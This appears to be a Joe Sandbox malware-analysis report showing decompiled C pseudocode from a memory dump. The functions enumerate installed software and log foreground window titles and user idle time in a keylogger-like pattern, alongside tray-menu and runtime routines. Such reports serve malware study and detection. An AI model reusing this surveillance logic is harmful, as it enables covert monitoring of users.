                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                    • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                    • API String ID: 2490988753-744132762
                    • Opcode ID: d30bf5144b07c6523917f2ebe4b756d5bb383713da0f8795a0bb91b899a473ae
                    • Instruction ID: ec032a2b9b2afcf1944104fdbdee5c9b5016f8d194ad9eb48286684fedf55356
                    • Opcode Fuzzy Hash: d30bf5144b07c6523917f2ebe4b756d5bb383713da0f8795a0bb91b899a473ae
                    • Instruction Fuzzy Hash: 4A31B1B250671167D320DF65DC48ECB7ADCAB84794F040A6AF844A3201E73CDAD48BAF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041B008 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 95%
                    			E0041B008(void* __ebx, void* __ecx, void* __edx) {
				char _v1028;
				char _v1052;
				void* _v1056;
				char _v1076;
				void* _v1080;
				char _v1100;
				void* _v1104;
				char _v1124;
				void* _v1128;
				char _v1148;
				void* _v1152;
				char _v1172;
				void* _v1176;
				char _v1196;
				void* _v1200;
				char _v1220;
				void* _v1224;
				char _v1244;
				void* _v1248;
				char _v1268;
				void* _v1272;
				char _v1292;
				void* _v1296;
				char _v1316;
				void* _v1320;
				char _v1340;
				char _v1364;
				char _v1388;
				char _v1412;
				char _v1436;
				char _v1460;
				void* _v1464;
				char _v1484;
				int _v1488;
				void* _v1492;
				void* _v1496;
				void* __edi;
				void* __ebp;
				long _t73;
				long _t79;
				int _t86;
				void* _t188;
				int _t207;
				void* _t208;
				void* _t210;
				void** _t211;

				_t188 = __edx;
				_t130 = __ebx;
				_t211 =  &_v1496;
				_t208 = __ecx;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v1492) == 0) {
					_v1488 = 0x400;
					_t207 = 0;
					E00401F66(__ebx,  &_v1460);
					_t73 = RegEnumKeyExA(_v1492, 0,  &_v1028,  &_v1488, 0, 0, 0, 0);
					_t210 = RegCloseKey;
					while(1) {
						__eflags = _t73 - 0x103;
						if(__eflags == 0) {
							break;
						}
						__eflags = _t73;
						if(_t73 != 0) {
							L8:
							_t207 = _t207 + 1;
							__eflags = _t207;
							_v1488 = 0x400;
						} else {
							_t79 = RegOpenKeyExA(_v1492,  &_v1028, 0, 0x20019,  &_v1496);
							__eflags = _t79;
							if(_t79 == 0) {
								E0041296F( &_v1484, _v1496, L"DisplayName");
								 *_t211 = L"Publisher";
								E0041296F( &_v1340, _v1496);
								 *_t211 = L"DisplayVersion";
								E0041296F( &_v1364, _v1496);
								 *_t211 = L"InstallLocation";
								E0041296F( &_v1388, _v1496);
								 *_t211 = L"InstallDate";
								E0041296F( &_v1412, _v1496);
								 *_t211 = L"UninstallString";
								E0041296F( &_v1436, _v1496);
								_t86 = E0040619C();
								__eflags = _t86;
								if(_t86 == 0) {
									E0040323D(E00402FF4(_t130,  &_v1316, E00402FF4(_t130,  &_v1292, E004042FD(_t130,  &_v1268, E00402FF4(_t130,  &_v1244, E004042FD(_t130,  &_v1220, E00402FF4(_t130,  &_v1196, E004042FD(_t130,  &_v1172, E00402FF4(_t130,  &_v1148, E004042FD(_t130,  &_v1124, E00402FF4(_t130,  &_v1100, E004042FD(_t130,  &_v1076, E004087F0( &_v1052,  &_v1484, _t210, "\t"), _t210, __eflags,  &_v1364), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1412), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1340), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1388), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1436), _t207, _t210, __eflags, _t149), _t207, _t210, __eflags, "\n"));
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
								}
								RegCloseKey(_v1496);
								E00401EE9();
								E00401EE9();
								E00401EE9();
								E00401EE9();
								E00401EE9();
								E00401EE9();
								goto L8;
							}
						}
						__eflags = 0;
						_t73 = RegEnumKeyExA(_v1492, _t207,  &_v1028,  &_v1488, 0, 0, 0, 0);
					}
					RegCloseKey(_v1492);
					E00403242(_t130, _t208, _t210, __eflags,  &_v1460);
					E00401EE9();
				} else {
					E0040415E(__ebx, _t208, _t188, 0, 0x46a8f0);
				}
				return _t208;
			}

















































                    0x0041b008
                    0x0041b008
                    0x0041b008
                    0x0041b01d
                    0x0041b032
                    0x0041b049
                    0x0041b051
                    0x0041b053
                    0x0041b06e
                    0x0041b074
                    0x0041b329
                    0x0041b329
                    0x0041b32e
                    0x00000000
                    0x00000000
                    0x0041b07f
                    0x0041b081
                    0x0041b302
                    0x0041b302
                    0x0041b302
                    0x0041b303
                    0x0041b087
                    0x0041b09f
                    0x0041b0a5
                    0x0041b0a7
                    0x0041b0ba
                    0x0041b0ca
                    0x0041b0d1
                    0x0041b0e1
                    0x0041b0e8
                    0x0041b0f5
                    0x0041b0fc
                    0x0041b109
                    0x0041b110
                    0x0041b11d
                    0x0041b124
                    0x0041b12e
                    0x0041b133
                    0x0041b135
                    0x0041b22b
                    0x0041b237
                    0x0041b243
                    0x0041b24f
                    0x0041b25b
                    0x0041b267
                    0x0041b273
                    0x0041b27f
                    0x0041b28b
                    0x0041b297
                    0x0041b2a3
                    0x0041b2af
                    0x0041b2bb
                    0x0041b2bb
                    0x0041b2c4
                    0x0041b2ca
                    0x0041b2d3
                    0x0041b2dc
                    0x0041b2e8
                    0x0041b2f4
                    0x0041b2fd
                    0x00000000
                    0x0041b2fd
                    0x0041b0a7
                    0x0041b30b
                    0x0041b323
                    0x0041b323
                    0x0041b338
                    0x0041b341
                    0x0041b34a
                    0x0041b034
                    0x0041b03b
                    0x0041b03b
                    0x0041b35a

                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B02A
                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B06E
                    • RegCloseKey.ADVAPI32(?), ref: 0041B338
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEnumOpen
                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                    • API String ID: 1332880857-3714951968
                    • Opcode ID: 5d3854b725c00038904661a9ed4b5ae5e0eaf187c07e43597808e73792df7bc4
                    • Instruction ID: 996ba4e169512d105bf10ccdef0111c5bf25efe0ecf00969fbd19f1ec1e96d73
                    • Opcode Fuzzy Hash: 5d3854b725c00038904661a9ed4b5ae5e0eaf187c07e43597808e73792df7bc4
                    • Instruction Fuzzy Hash: 688123711082459BD324EB51D891EEFB3E8EF94308F50493FF586921D2EF349949CA9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040A249 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 156sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 89%
                    			E0040A249(void* __ecx, void* __edx) {
				char _v28;
				char _v56;
				char _v76;
				char _v80;
				char _v100;
				void* _v104;
				char _v108;
				char _v112;
				struct HWND__* _v116;
				void* __ebx;
				void* __edi;
				void* __ebp;
				int _t36;
				struct HWND__* _t42;
				void* _t50;
				int _t57;
				struct HWND__* _t77;
				void* _t119;
				void* _t125;
				signed int _t126;
				void* _t128;

				_t112 = __edx;
				_t128 = (_t126 & 0xfffffff8) - 0x74;
				_push(_t77);
				_push(0xea60);
				_t119 = __ecx;
				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
					Sleep(0x1f4);
					_t77 = GetForegroundWindow();
					_t36 = GetWindowTextLengthW(_t77);
					_t4 = _t36 + 1; // 0x1
					E0040AE7E(_t77,  &_v100, _t112, _t119, _t125, _t4, 0);
					if(_t36 != 0) {
						_t57 = E0040245C();
						GetWindowTextW(_t77, E00401EE4( &_v100), _t57);
						_t112 = 0x474c34;
						if(E0040AF46(0x474c34) == 0) {
							E0040AE66(0x474c34,  &_v100);
							E004086B8(E0040245C() - 1);
							_t128 = _t128 - 0x18;
							_t137 =  *0x47308b;
							if( *0x47308b == 0) {
								_t112 = E0040AEF6( &_v76, L"\r\n[", _t125,  &_v108);
								E00402FF4(_t77, _t128, _t67, _t119, _t125, __eflags, L"]\r\n");
								E00409BA9(_t119);
								E00401EE9();
							} else {
								E004086D0(_t77, _t128, 0x474c34, _t137,  &_v108);
								E0040A6DA(_t77, _t119, _t137);
							}
						}
					}
					_t83 = _t119;
					E0040ACBE(_t119);
					if(E0041A641(_t119) < 0xea60) {
						L18:
						E00401EE9();
						continue;
					} else {
						_t77 = _v116;
						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
							_t42 = E0041A641(_t83);
							if(_t42 < 0xea60) {
								__eflags = _t77 % 0xea60;
								E00440751(_t83, _t77 / 0xea60,  &_v112, 0xa);
								_t50 = E00408832(_t77,  &_v80, E004052DD(_t77,  &_v56, "\r\n{ User has been idle for ", _t125, __eflags, E00402073(_t77,  &_v28, _t77 % 0xea60, _t125,  &_v112)), _t119, _t125, __eflags, " minutes }\r\n");
								_t128 = _t128 + 0xc - 0x14;
								_t112 = _t50;
								E0041A7B9(_t128, _t50);
								E00409BA9(_t119);
								E00401FB8();
								E00401FB8();
								E00401FB8();
								goto L18;
							}
							_t77 = _t42;
							_v116 = _t77;
							Sleep(0x3e8);
						}
						E00401EE9();
						break;
					}
				}
				__eflags = 0;
				return 0;
			}
























                    0x0040a249
                    0x0040a24f
                    0x0040a252
                    0x0040a253
                    0x0040a255
                    0x0040a257
                    0x0040a2b6
                    0x0040a2c2
                    0x0040a2c5
                    0x0040a2cf
                    0x0040a2d7
                    0x0040a2de
                    0x0040a2e8
                    0x0040a2f9
                    0x0040a2ff
                    0x0040a30f
                    0x0040a31b
                    0x0040a32f
                    0x0040a334
                    0x0040a33b
                    0x0040a342
                    0x0040a36c
                    0x0040a370
                    0x0040a378
                    0x0040a381
                    0x0040a344
                    0x0040a347
                    0x0040a34e
                    0x0040a34e
                    0x0040a342
                    0x0040a30f
                    0x0040a386
                    0x0040a388
                    0x0040a399
                    0x0040a441
                    0x0040a445
                    0x00000000
                    0x0040a39f
                    0x0040a39f
                    0x0040a3a3
                    0x0040a3b3
                    0x0040a3ba
                    0x0040a3da
                    0x0040a3dd
                    0x0040a40e
                    0x0040a413
                    0x0040a416
                    0x0040a41a
                    0x0040a421
                    0x0040a42a
                    0x0040a433
                    0x0040a43c
                    0x00000000
                    0x0040a43c
                    0x0040a3bc
                    0x0040a3c3
                    0x0040a3c7
                    0x0040a3c7
                    0x0040a453
                    0x00000000
                    0x0040a453
                    0x0040a399
                    0x0040a45a
                    0x0040a460

                    APIs
                    • __Init_thread_footer.LIBCMT ref: 0040A2AB
                    • Sleep.KERNEL32(000001F4), ref: 0040A2B6
                    • GetForegroundWindow.USER32 ref: 0040A2BC
                    • GetWindowTextLengthW.USER32(00000000), ref: 0040A2C5
                    • GetWindowTextW.USER32 ref: 0040A2F9
                    • Sleep.KERNEL32(000003E8), ref: 0040A3C7
                      • Part of subcall function 00409BA9: SetEvent.KERNEL32(?,?,00000000,0040A780,00000000), ref: 00409BD5
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                    • String ID: [${ User has been idle for $ minutes }$4LG$4LG$4LG$]
                    • API String ID: 911427763-2724478313
                    • Opcode ID: 169f969ac849e0fe77356033552f853f150fe819bbc07c61be17f1031f358252
                    • Instruction ID: e6d26ec29f6efd9614cca4dfe6135636dd5a7624a68a80ed8f9da63f1efc7c64
                    • Opcode Fuzzy Hash: 169f969ac849e0fe77356033552f853f150fe819bbc07c61be17f1031f358252
                    • Instruction Fuzzy Hash: 3351C3316083405BC314FB71D886A6F77A5AB94308F40097FF886A62E2DF7C9A55C69F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041BE9A Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 64%
                    			E0041BE9A(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x472b1c = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x472b20);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x472b10) == 0) {
							ShowWindow( *0x472b10, 9);
							SetForegroundWindow( *0x472b10);
						} else {
							ShowWindow( *0x472b10, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x472b1c, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L7:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L7;
			}








                    0x0041bea2
                    0x0041bea5
                    0x0041bf76
                    0x0041bf83
                    0x0041bf8b
                    0x0041bf91
                    0x00000000
                    0x0041bf91
                    0x0041beab
                    0x0041beb0
                    0x0041bf5f
                    0x00000000
                    0x00000000
                    0x0041bf68
                    0x0041bf70
                    0x0041bf70
                    0x0041bebb
                    0x0041becb
                    0x0041bed0
                    0x0041bf2d
                    0x0041bf47
                    0x0041bf53
                    0x0041bf2f
                    0x0041bf37
                    0x0041bf37
                    0x00000000
                    0x0041bf2d
                    0x0041bed5
                    0x0041bef4
                    0x0041befd
                    0x0041bf17
                    0x00000000
                    0x0041bf17
                    0x0041bed7
                    0x0041beda
                    0x0041bedd
                    0x0041bee2
                    0x00000000
                    0x0041bee5
                    0x0041bebd
                    0x0041bec0
                    0x0041bec3
                    0x00000000

                    APIs
                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041BEE5
                    • GetCursorPos.USER32(?), ref: 0041BEF4
                    • SetForegroundWindow.USER32(?), ref: 0041BEFD
                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041BF17
                    • Shell_NotifyIconA.SHELL32(00000002,00472B20), ref: 0041BF68
                    • ExitProcess.KERNEL32 ref: 0041BF70
                    • CreatePopupMenu.USER32 ref: 0041BF76
                    • AppendMenuA.USER32 ref: 0041BF8B
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                    • String ID: Close
                    • API String ID: 1657328048-3535843008
                    • Opcode ID: 671d0a36089a7764a87accef62fbf46538a6333771b6ae1721ed7aed7857f9ea
                    • Instruction ID: dfe43188851c1a6f81b140f94b5f6a7c696d7e25908ee8c8785907bb885635e0
                    • Opcode Fuzzy Hash: 671d0a36089a7764a87accef62fbf46538a6333771b6ae1721ed7aed7857f9ea
                    • Instruction Fuzzy Hash: AC212631108209BFDB054FA4ED0DEAA3B65FB08312F104539FE05A01B1D7B6D9A1EF59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00444657 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E00444657(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				signed int _t192;
				void* _t193;
				intOrPtr _t197;
				short* _t209;
				intOrPtr* _t211;
				intOrPtr* _t215;
				signed int _t216;
				signed int _t217;
				void* _t218;
				void* _t219;

				_t101 =  *0x46f00c; // 0x54ba778e
				_v8 = _t101 ^ _t217;
				_t211 = _a4;
				_t170 = 0;
				_v64 = _t211;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t211;
				_v72 = 0;
				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
					__eflags =  *(_t211 + 0x8c);
					if( *(_t211 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t211 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t211 + 0x90) = _t170;
					 *_t211 = 0x45b890;
					 *((intOrPtr*)(_t211 + 0x94)) = 0x45bb10;
					 *((intOrPtr*)(_t211 + 0x98)) = 0x45bc90;
					 *((intOrPtr*)(_t211 + 4)) = 1;
					L41:
					return E004338BB(_v8 ^ _t217);
				}
				_t106 = _t211 + 8;
				_v44 = 0;
				if( *(_t211 + 8) != 0) {
					L3:
					_v44 = E004443F4(_t172, 1, 4);
					E00445002(_t170);
					_v32 = E004443F4(_t172, 0x180, 2);
					E00445002(_t170);
					_v36 = E004443F4(_t172, 0x180, 1);
					E00445002(_t170);
					_v40 = E004443F4(_t172, 0x180, 1);
					E00445002(_t170);
					_t197 = E004443F4(_t172, 0x101, 1);
					_v52 = _t197;
					E00445002(_t170);
					_t219 = _t218 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						E00445002(_v44);
						E00445002(_v32);
						E00445002(_v36);
						E00445002(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t197) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t235 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t197 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t192 = 0xff;
						_t130 = E004496E6(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						_t236 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t197 + 1; // 0x1
						_t134 = E004496E6(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = E0044F9AC(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
							_t219 = _t219 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t193 = _v32;
							_t138 = _t193 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v68 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v56 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t193, _t193 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t215 = _v64;
								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										E00445002( *(_t215 + 0x90) - 0xfe);
										E00445002( *(_t215 + 0x94) - 0x80);
										E00445002( *(_t215 + 0x98) - 0x80);
										E00445002( *((intOrPtr*)(_t215 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
								 *_t215 = _v60;
								 *(_t215 + 0x90) = _v32;
								 *(_t215 + 0x94) = _v68;
								 *(_t215 + 0x98) = _v56;
								 *(_t215 + 4) = _v48;
								L37:
								E00445002(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t216 =  *(_t189 - 1) & 0x000000ff;
									if(_t216 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t209 = _t193 + 0x100 + _t216 * 2;
									do {
										_t216 = _t216 + 1;
										 *_t209 = 0x8000;
										_t209 = _t209 + 2;
									} while (_t216 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t192 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t192 <= _t166) {
									 *((char*)(_t192 + _t197)) = 0x20;
									_t192 = _t192 + 1;
									__eflags = _t192;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								_t242 =  *(_t190 - 1) - _t170;
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_t168 = E004516F4(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
				_t219 = _t218 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}



















































                    0x0044465f
                    0x00444666
                    0x0044466b
                    0x0044466e
                    0x00444671
                    0x00444674
                    0x00444677
                    0x0044467d
                    0x00444680
                    0x00444683
                    0x00444686
                    0x00444689
                    0x0044468e
                    0x004449ae
                    0x004449b0
                    0x004449b2
                    0x004449b2
                    0x004449b5
                    0x004449bb
                    0x004449bd
                    0x004449c3
                    0x004449c9
                    0x004449d3
                    0x004449dd
                    0x004449e4
                    0x004449f4
                    0x004449f4
                    0x00444694
                    0x00444697
                    0x0044469c
                    0x004446ba
                    0x004446c4
                    0x004446c7
                    0x004446da
                    0x004446dd
                    0x004446eb
                    0x004446ee
                    0x004446fc
                    0x004446ff
                    0x00444710
                    0x00444713
                    0x00444716
                    0x0044471b
                    0x00444721
                    0x00444975
                    0x00444978
                    0x00444980
                    0x00444988
                    0x00444990
                    0x0044499a
                    0x0044499a
                    0x00000000
                    0x0044474a
                    0x0044474a
                    0x0044474c
                    0x0044474c
                    0x0044474f
                    0x00444750
                    0x00444766
                    0x00000000
                    0x00000000
                    0x0044476c
                    0x0044476f
                    0x00444772
                    0x00000000
                    0x00000000
                    0x0044477f
                    0x00444782
                    0x00444785
                    0x004447a2
                    0x004447a7
                    0x004447aa
                    0x004447ac
                    0x00000000
                    0x00000000
                    0x004447c6
                    0x004447d6
                    0x004447db
                    0x004447e0
                    0x00000000
                    0x00000000
                    0x004447ea
                    0x00444817
                    0x0044482d
                    0x00444830
                    0x00444835
                    0x0044483a
                    0x00000000
                    0x00000000
                    0x00444840
                    0x00444845
                    0x0044484b
                    0x0044484e
                    0x00444851
                    0x00444854
                    0x00444857
                    0x0044485a
                    0x00444861
                    0x00444864
                    0x00444867
                    0x00444869
                    0x0044486f
                    0x00444872
                    0x00444874
                    0x004448b6
                    0x004448b8
                    0x004448c1
                    0x004448c6
                    0x004448c9
                    0x004448d3
                    0x004448d5
                    0x004448d8
                    0x004448da
                    0x004448e3
                    0x004448e5
                    0x004448e7
                    0x004448e8
                    0x004448f3
                    0x004448f8
                    0x004448fc
                    0x0044490a
                    0x0044491d
                    0x0044492b
                    0x00444936
                    0x0044493b
                    0x004448fc
                    0x0044493e
                    0x00444941
                    0x00444947
                    0x00444950
                    0x00444955
                    0x0044495e
                    0x00444967
                    0x00444970
                    0x0044499b
                    0x0044499e
                    0x00000000
                    0x0044487b
                    0x0044487b
                    0x0044487e
                    0x0044487e
                    0x00444882
                    0x00000000
                    0x00000000
                    0x00444884
                    0x0044488d
                    0x004448ab
                    0x004448ab
                    0x004448b1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004448b1
                    0x00444895
                    0x00444898
                    0x0044489d
                    0x0044489e
                    0x004448a1
                    0x004448a7
                    0x00000000
                    0x00444898
                    0x00000000
                    0x004448b3
                    0x004447f1
                    0x004447f1
                    0x004447f4
                    0x004447f4
                    0x004447f8
                    0x00000000
                    0x00000000
                    0x004447fa
                    0x004447fe
                    0x0044480b
                    0x00444803
                    0x00444807
                    0x00444807
                    0x00444808
                    0x00444808
                    0x0044480f
                    0x00444812
                    0x00444815
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00444815
                    0x00000000
                    0x004447f4
                    0x004447ea
                    0x00444721
                    0x004446aa
                    0x004446af
                    0x004446b4
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$Info
                    • String ID:
                    • API String ID: 2509303402-0
                    • Opcode ID: a8cc77335abd681ecdd4907e4e1c8762169d6c95eeac57854194a817c881b2f5
                    • Instruction ID: ad40bc67768ff577a85139c61b858be7675e1a203c69b77c022c2f93fc340f39
                    • Opcode Fuzzy Hash: a8cc77335abd681ecdd4907e4e1c8762169d6c95eeac57854194a817c881b2f5
                    • Instruction Fuzzy Hash: D5B1AFB1900245AFEB20DF79C881BAFBBF4BF49304F14406EF495A7352DB7998419B64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0044FB46 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0044FB46(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x46f188) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00445002(_t46);
							E0044ED82( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00445002(_t47);
							E0044F23C( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00445002( *((intOrPtr*)(_t74 + 0x7c)));
						E00445002( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00445002( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00445002( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00445002( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00445002( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0044FCB9( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x46f2a8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
